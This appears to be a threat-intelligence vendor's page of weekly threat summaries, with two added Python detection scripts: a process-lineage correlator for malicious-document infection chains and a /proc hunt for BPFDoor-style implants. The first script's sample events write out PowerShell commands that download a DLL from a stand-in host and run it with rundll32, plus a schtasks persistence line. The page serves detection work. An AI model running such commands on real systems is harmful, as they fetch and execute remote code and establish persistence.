The Anvilogic Threat Reports

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks: each report helps your team look for malicious exploit strings and run exposure checks on endpoint devices and servers, which can identify successful payload delivery and compromise through the vulnerability in question.

Intelligence Levels
  • Tactical: Detectable threat behaviors, paired with Threat Scenarios or Threat Identifiers for response
  • Strategic: General information security news, for awareness

About the Team

The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.

Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.

Our Craft

Curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our craft are:

  • Detections
    • Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
    • Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
  • Reports, hot off the forge:
    • Threat News Reports
    • Trending Threat Reports
    • Research Articles

Want more?

If this information is useful, please feel free to get in touch with us at yo@anvilogic.com to see how Anvilogic can help you grow your security operations.

Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.

If you are not a customer but would like the detection code for a specific vulnerability or exploit, reach out to us; we’re happy to help: detection.support@anvilogic.com

Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform

Increased Threats to Managed Service Providers

May 17, 2022

Industry: Technology | Level: Strategic | Source: CISA

A warning was issued to managed service providers (MSPs) by the Five Eyes, the intelligence alliance of the United States, United Kingdom, Australia, Canada, and New Zealand. As stated in the advisory, “Whether the customer’s network environment is on-premises or externally hosted, threat actors can use a vulnerable MSP as an initial access vector to multiple victim networks, with globally cascading effects. The UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities expect malicious cyber actors—including state-sponsored advanced persistent threat (APT) groups—to step up their targeting of MSPs in their efforts to exploit provider-customer network trust relationships. For example, threat actors successfully compromising an MSP could enable follow-on activity—such as ransomware and cyber espionage—against the MSP as well as across the MSP’s customer base.” The agencies have not named specific targets, citing only reports of increased cyber activity against MSPs. Their recommendations urge hardening defenses: reinforcing public-facing applications, enabling and improving logging, implementing MFA, segmenting networks, applying the principle of least privilege, deprecating obsolete accounts and systems, keeping systems updated, and maintaining regular backups of data.

Operation CuckooBees

May 17, 2022

Industry: Aerospace, Biotechnology, Defense, Energy, Pharmaceuticals | Level: Strategic | Source: Cybereason

Cybereason conducted a 12-month investigation, named Operation CuckooBees, into a sophisticated global cyber espionage campaign stealing intellectual property. The campaign is attributed to the Chinese state-sponsored APT group Winnti. Impacted industries are Aerospace, Biotechnology, Defense, Energy, and Pharmaceuticals, with victims in North America, Europe, and Asia. Cybereason notes that many affected companies never disclosed a breach, and evidence points to a longer-running campaign stretching back to at least 2019. The business impact of intellectual property theft is not as immediate as that of ransomware, DDoS, and similar threats; the market and financial damage plays out over the long term. Investment in research and development (R&D) cannot be recouped, and competing becomes harder when a company is up against its own stolen product. Common weaknesses are cited as the means of compromise, such as “unpatched systems, insufficient network segmentation, unmanaged assets, forgotten accounts, and a lack of multi-factor authentication.” A representative of the Chinese Embassy has denied Chinese involvement in cyberattacks, a denial that is to be expected from a nation-state actor and likely untrue.

Ransomware Forces Closure of Lincoln College

May 17, 2022

After 157 years in Illinois, the liberal-arts school Lincoln College will cease operations and close after the spring semester, on May 13th, 2022.

German Automotive Sector Targeted with Info-Stealer Campaign

May 17, 2022

Industry: Automotive | Level: Tactical | Source: CheckPoint

A threat operation discovered by Check Point used information-stealing malware against 14 German organizations, primarily in the automotive industry, including dealerships and manufacturers. The campaign was tracked back to at least July 2021. German automotive businesses were used as the campaign’s disguise, with the attackers registering domains imitating those businesses to send the emails and host the malware. The phishing email carries an ISO file, which evades the NTFS Mark-of-the-Web (MOTW) control because files inside a mounted image do not inherit the zone marking; the ISO contains an HTA file. When the HTA is opened, mshta.exe runs it and executes embedded VBScript or PowerShell to download additional payloads or modify the registry. Delivered payloads include various information stealers such as Raccoon, AZORult, and BitRAT, and the compromised data includes personal and credit card information. Attribution of the campaign is unclear; hosting infrastructure was identified in Iran, but that alone is not definitive evidence. The attackers’ exact motives also remain undetermined: despite the theft of personal and financial information, a larger play of espionage or business fraud is possible.

Anvilogic Scenario:

  • Malicious Document Delivering Malware

Anvilogic Use Cases:

  • MSHTA.exe execution
  • BITSadmin Execution
  • Modify Registry Key
  • Invoke-WebRequest Command
  • Output to File

Bitter APT Targets Bangladesh

May 17, 2022

Industry: N/A | Level: Tactical | Source: CiscoTalos

Cisco Talos identified activity by the Bitter APT group targeting the Bangladesh government dating back to August 2021. Historically the group has targeted entities in China, Pakistan, and Saudi Arabia, so the focus on Bangladesh is new. The campaign begins with spear-phishing emails masquerading as “regular operational tasks”; the emails, sent using Zimbra and JavaMail, carry either a malicious Word document that abuses Microsoft vulnerabilities such as the Equation Editor flaw CVE-2017-11882, or a weaponized Excel document whose embedded object configures a scheduled task. Once initial access is obtained, the threat actor’s trojan, named “ZxxZ” by Cisco Talos, is deployed; it disguises itself as a Windows Security update and provides capabilities such as remote code execution. It performs system information discovery and identifies defensive tools such as Windows Defender or other known antivirus software. The group’s main objective is cyber espionage.

Anvilogic Scenario:

  • Bitter APT – Infection Chain with Equation Editor

Anvilogic Use Cases:

  • Abuse EQNEDT32.EXE CVE-2017-11882
  • Create/Modify Schtasks
  • Executable File Written to Disk
  • Invoke-WebRequest Command
  • Query Registry
  • Executable Process from Suspicious Folder
  • Network Connection with Suspicious Folder
  • Remote Thread from Suspicious Folder

Phishing with World Health Organization Themes

May 17, 2022

Industry: N/A | Level: Tactical | Source: Proofpoint

Research from Proofpoint has identified distribution of the Nerbian remote access trojan (RAT) through phishing emails using COVID-19 and World Health Organization themes. The campaign began on April 26th, 2022, with emails targeting entities in Italy, Spain, and the United Kingdom. The emails contain either a malicious document or a compressed archive containing one. When the embedded macro executes, cmd.exe calls PowerShell to download a BAT file, and the BAT file in turn launches PowerShell to download additional payloads, including the RAT. The RAT establishes persistence and can download further payloads as needed. No attribution has been placed on Nerbian RAT.

Anvilogic Scenario:

  • Nerbian RAT Infection Chain from Malicious Document

Anvilogic Use Cases:

  • Malicious Document Execution
  • Compressed File Execution
  • Suspicious Executable by CMD.exe
  • Executable Create Script Process
  • Invoke-WebRequest Command
  • Executable File Written to Disk
  • Suspicious Executable by Powershell
  • Executable Process from Suspicious Folder
  • Network Connection with Suspicious Folder
  • Create/Modify Schtasks

Ursnif Phishing Campaigns

May 17, 2022

Industry: Financial, Government | Level: Tactical | Source: Qualys

Qualys has published an analysis of the Ursnif banking malware. The information stealer, which can steal credentials, log keystrokes, and download additional payloads, has been a prevalent threat since 2020. Ursnif is predominantly distributed through phishing emails targeting the banking, financial services, and government verticals. In the latest stream of phishing campaigns, attackers leverage current events and impersonate government authorities to lure victims. The malicious attachment is either an Excel document or a zip archive; the two infection chains differ slightly but end in the same place. In the Excel scenario, a binary is downloaded when the macro executes, and the binary spoofs its parent process ID (PPID) so that it appears to be a child of explorer.exe, for defense evasion. In the zip scenario, the archive contains an HTA file that, when run, launches PowerShell to download a DLL, which is then executed with rundll32.

Anvilogic Scenario:

  • Malicious Document Delivering Malware

Anvilogic Use Cases:

  • Malicious Document Execution
  • Compressed File Execution
  • Invoke-Expression Command
  • MSHTA.exe execution
  • Query Registry
  • Rundll32 Command Line
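
The four infection chains above (the German automotive campaign, Bitter APT, Nerbian RAT, and Ursnif) all reduce to a parent-child process pattern that the use cases list as atomic detections and then combine into a scenario. The following is an added example, not Anvilogic’s code or detection content: it evaluates a handful of atomic identifiers over constructed Sysmon-style process-creation events and fires a “Malicious Document Delivering Malware” scenario only when a follow-on identifier sits in the lineage of an initial-access one. The identifier names are modelled on the use-case names above; the matching logic, the event fields, and the sample events (the example.invalid URLs, paths, and PIDs) are all assumptions.

```python
"""
Added example (not Anvilogic's detection content): atomic threat identifiers
evaluated over process-creation events, then correlated along process lineage
into a sequence-based threat scenario. Event fields follow Sysmon Event ID 1
naming; all events are constructed and identifier names mirror the use cases.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from ntpath import basename  # Windows path handling on any host OS


@dataclass(frozen=True)
class ProcEvent:
    host: str
    pid: int
    ppid: int
    image: str          # full path of the created process
    cmdline: str
    parent_image: str


# Processes that render attacker-controlled documents or scripts (initial access).
DOC_HANDLERS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe", "mshta.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile", re.I)
SCHTASKS_RE = re.compile(r"\bschtasks(\.exe)?\b.*/(create|change)\b", re.I)
INITIAL_ACCESS = {"MSHTA.exe execution", "Abuse EQNEDT32.EXE CVE-2017-11882",
                  "Document Handler Spawns Shell"}
FOLLOW_ON = {"Invoke-WebRequest Command", "Create/Modify Schtasks",
             "Rundll32 Command Line", "Output to File"}


def threat_identifiers(ev: ProcEvent) -> set[str]:
    """Atomic detections; each fires on a single event, independently of the others."""
    img = basename(ev.image).lower()
    parent = basename(ev.parent_image).lower()
    cmd = ev.cmdline
    hits: set[str] = set()
    if img == "mshta.exe":
        hits.add("MSHTA.exe execution")
    if img == "eqnedt32.exe" and parent in DOC_HANDLERS:
        hits.add("Abuse EQNEDT32.EXE CVE-2017-11882")
    if parent in DOC_HANDLERS and img in SHELLS:
        hits.add("Document Handler Spawns Shell")
    if DOWNLOAD_RE.search(cmd):
        hits.add("Invoke-WebRequest Command")
    if SCHTASKS_RE.search(cmd):
        hits.add("Create/Modify Schtasks")
    if img == "rundll32.exe" and re.search(r"\.dll\b", cmd, re.I):
        hits.add("Rundll32 Command Line")
    if re.search(r"-outfile\b", cmd, re.I):
        hits.add("Output to File")
    return hits


def threat_scenarios(events: list[ProcEvent]) -> dict[str, list[str]]:
    """Sequence-based detection: a follow-on identifier fires the scenario only when an
    initial-access identifier fired on the same process or one of its ancestors.
    Returns host -> sorted identifiers that made up the chain."""
    by_key = {(e.host, e.pid): e for e in events}
    ids = {(e.host, e.pid): threat_identifiers(e) for e in events}
    fired: dict[str, set[str]] = {}
    for ev in events:
        if not ids[(ev.host, ev.pid)] & FOLLOW_ON:
            continue
        chain: set[str] = set()
        seen: set[tuple[str, int]] = set()
        cur: ProcEvent | None = ev
        while cur is not None and (cur.host, cur.pid) not in seen:  # walk up the tree
            seen.add((cur.host, cur.pid))
            chain |= ids[(cur.host, cur.pid)]
            cur = by_key.get((cur.host, cur.ppid))  # None once the parent is outside telemetry
        if chain & INITIAL_ACCESS:
            fired.setdefault(ev.host, set()).update(chain)
    return {h: sorted(v) for h, v in fired.items()}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EQ = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
EVENTS = [  # constructed sample telemetry
    # ws-01: ISO -> HTA under mshta.exe -> PowerShell download -> rundll32 (automotive and Ursnif chains)
    ProcEvent("ws-01", 4120, 3004, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "D:\Rechnung.hta"', r"C:\Windows\explorer.exe"),
    ProcEvent("ws-01", 4188, 4120, PS, r"powershell -w hidden -c Invoke-WebRequest "
              r"http://example.invalid/l.dll -OutFile C:\Users\Public\l.dll", r"C:\Windows\System32\mshta.exe"),
    ProcEvent("ws-01", 4250, 4188, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Users\Public\l.dll,DllRegisterServer", PS),
    # ws-02: Word -> Equation Editor (CVE-2017-11882) -> cmd.exe creating a scheduled task (Bitter chain)
    ProcEvent("ws-02", 5200, 5100, EQ, "EQNEDT32.EXE -Embedding",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    ProcEvent("ws-02", 5230, 5200, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c schtasks /create /sc minute "
              r"/mo 5 /tn WinUpdate /tr C:\Users\Public\wsus.exe", EQ),
    # ws-03: an administrator's download from an interactive shell: atomic hits, but no initial-access lineage
    ProcEvent("ws-03", 7001, 7000, PS, r"powershell -NoProfile -c Invoke-WebRequest "
              r"https://example.invalid/r.csv -OutFile C:\Reports\r.csv", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for host, chain in threat_scenarios(EVENTS).items():
        print(f"{host}: Malicious Document Delivering Malware <- {', '.join(chain)}")
```

The point of the lineage walk is the ws-03 host: its PowerShell download trips two atomic identifiers, exactly as an administrator’s routine work would, but no document handler sits above it in the process tree, so the scenario stays quiet. Real telemetry should also key the lookup on process start time or a process GUID, since PIDs are reused.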

Linux Backdoor, BPFDoor

May 17, 2022

Industry: Education, Government, Logistics, Telecommunications | Level: Tactical | Source: SandFlySecurity

BPFDoor, an evasive Linux backdoor attributed to the Chinese threat actor Red Menshen, has been researched by Kevin Beaumont, PricewaterhouseCoopers (PwC), and the Sandfly Security team. The tool’s stealth makes it well suited to espionage and long-term persistent access. Using a Berkeley Packet Filter (BPF) sniffer, BPFDoor monitors network traffic and can send packets. Because it sniffs at the packet level rather than listening on a port, it sees incoming packets regardless of host firewall rules and requires no open ports. Once on the host, the malware requires root to run and operates as an in-memory implant; persistence is established with scripts or a crontab entry. Attackers take control of the implant once it modifies the firewall configuration: “Upon receiving a special packet, it will modify the local firewall to allow the attacker IP address to access resources such as a spawned shell or connect back bindshell.” Access to the implant is additionally gated by a “magic” password, as identified by security researcher Kevin Beaumont. Red Menshen targets organizations in the education, government, logistics, and telecommunications verticals, geographically in Asia and the Middle East.

Anvilogic Scenario:

  • Unix File Download, Modified, Executed

Anvilogic Use Cases:

  • Linux Malware – BPFDoor
  • Sudoers Misconfiguration PrivEsc
  • Crontab Job Scheduling (Unix)
  • File Download (Unix)
  • File Modified for Execution
  • File Execution (Unix)
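
A hunt for the traits described above (a packet sniffer with no listening port, a binary removed from disk, a spoofed process name), written here as an added example rather than any of the researchers’ tooling: it correlates AF_PACKET socket inodes from /proc/net/packet with the process holding them, then checks /proc/<pid>/exe and the command line. The sample /proc data is constructed and modelled on public reporting; the paths and process names in it are assumptions, and the checks are heuristics (a legitimate DHCP client also holds a packet socket, which is why one appears in the sample).

```python
"""
Added example (not Sandfly's, PwC's or Kevin Beaumont's tooling): hunt for a
BPFDoor-style implant by correlating AF_PACKET sockets in /proc/net/packet with
the process holding them, then checking for a deleted on-disk binary and a
spoofed command line. The sample /proc data below is constructed.
"""
from __future__ import annotations

import os
import re
from dataclasses import dataclass

SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")   # format of /proc/<pid>/fd/* links
DELETED = " (deleted)"                           # suffix the kernel adds to /proc/<pid>/exe


@dataclass
class Proc:
    pid: int
    exe: str          # target of /proc/<pid>/exe
    cmdline: str      # /proc/<pid>/cmdline with NULs replaced by spaces
    fds: list[str]    # targets of /proc/<pid>/fd/*


def packet_socket_inodes(proc_net_packet: str) -> set[int]:
    """Inodes of AF_PACKET sockets. Columns of /proc/net/packet after the header:
    sk RefCnt Type Proto Iface R Rmem User Inode."""
    inodes: set[int] = set()
    for line in proc_net_packet.splitlines()[1:]:
        cols = line.split()
        if len(cols) >= 9:
            inodes.add(int(cols[8]))
    return inodes


def hunt(proc_net_packet: str, procs: list[Proc]) -> dict[int, list[str]]:
    """pid -> reasons, for every process holding a packet socket. A sniffer needs no
    listening port, so this is what a port scan or `ss -ltn` would miss."""
    inodes = packet_socket_inodes(proc_net_packet)
    findings: dict[int, list[str]] = {}
    for p in procs:
        held: set[int] = set()
        for fd in p.fds:
            m = SOCKET_RE.match(fd)
            if m:
                held.add(int(m.group(1)))
        if not held & inodes:
            continue
        reasons = ["holds AF_PACKET socket (BPF sniffer capable)"]
        exe = p.exe
        if exe.endswith(DELETED):
            exe = exe[: -len(DELETED)]
            reasons.append("executable deleted from disk (in-memory implant)")
        exe_name = os.path.basename(exe)
        argv0 = os.path.basename(p.cmdline.split(" ", 1)[0]) if p.cmdline else ""
        if argv0 and argv0 != exe_name:
            reasons.append(f"argv[0] {argv0!r} does not match exe {exe_name!r} (name spoofing)")
        findings[p.pid] = reasons
    return findings


def collect_live() -> tuple[str, list[Proc]]:
    """Read the real /proc on a Linux host; run as root to see every process's exe and fds."""
    with open("/proc/net/packet") as f:
        table = f.read()
    procs: list[Proc] = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        base = f"/proc/{name}"
        try:
            exe = os.readlink(f"{base}/exe")
            with open(f"{base}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            fds = [os.readlink(f"{base}/fd/{fd}") for fd in os.listdir(f"{base}/fd")]
        except OSError:
            continue   # kernel thread, already exited, or not permitted
        procs.append(Proc(int(name), exe, cmdline, fds))
    return table, procs


# Constructed sample, modelled on public reporting: the implant copies itself to
# /dev/shm, runs, unlinks the copy and renames its process to look like udevd.
SAMPLE_PACKET_TABLE = """sk       RefCnt Type Proto  Iface R Rmem   User   Inode
ffff9a1c 3      3    0003   2     1 0      0      24567
ffff9a1d 3      3    0003   0     1 0      0      31002
"""
SAMPLE_PROCS = [
    Proc(1, "/usr/lib/systemd/systemd", "/sbin/init", ["/dev/null", "socket:[9001]"]),
    Proc(812, "/usr/sbin/dhclient", "/usr/sbin/dhclient -4 -v eth0", ["socket:[24567]"]),
    Proc(2133, "/dev/shm/kdmtmpflush" + DELETED, "/sbin/udevd -d", ["socket:[31002]", "/dev/null"]),
]

if __name__ == "__main__":
    for pid, reasons in hunt(SAMPLE_PACKET_TABLE, SAMPLE_PROCS).items():
        print(pid, "; ".join(reasons))
```

On a live host, `hunt(*collect_live())` as root performs the same checks against the real /proc. Expect a single “holds AF_PACKET socket” reason on DHCP clients, tcpdump and similar tools; it is the combination with a deleted executable or a mismatched argv[0] that deserves a closer look, as does any process that passes these checks but whose iptables rules change on their own.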

Quantum Ransomware Analyzed by Cybereason

May 17, 2022

Cybereason has been analyzing Quantum ransomware, the latest in a series of rebrands that began with Mount Locker (September 2020) and continued as Astro Locker (March 2021) and Xing Locker (May 2021).

AGCO, Farming and Equipment Maker Hit by Ransomware

May 10, 2022

Industry: Agricultural | Level: Strategic | Source: AgcoCorp

A ransomware attack impacted AGCO, an agricultural equipment manufacturer and distributor, on May 5th, 2022. In its statement on the incident, AGCO said it expects operations to be affected, with recovery requiring “Several days and potentially longer to fully resume all services depending upon how quickly the Company is able to repair its systems.” No details were given on the ransomware strain involved.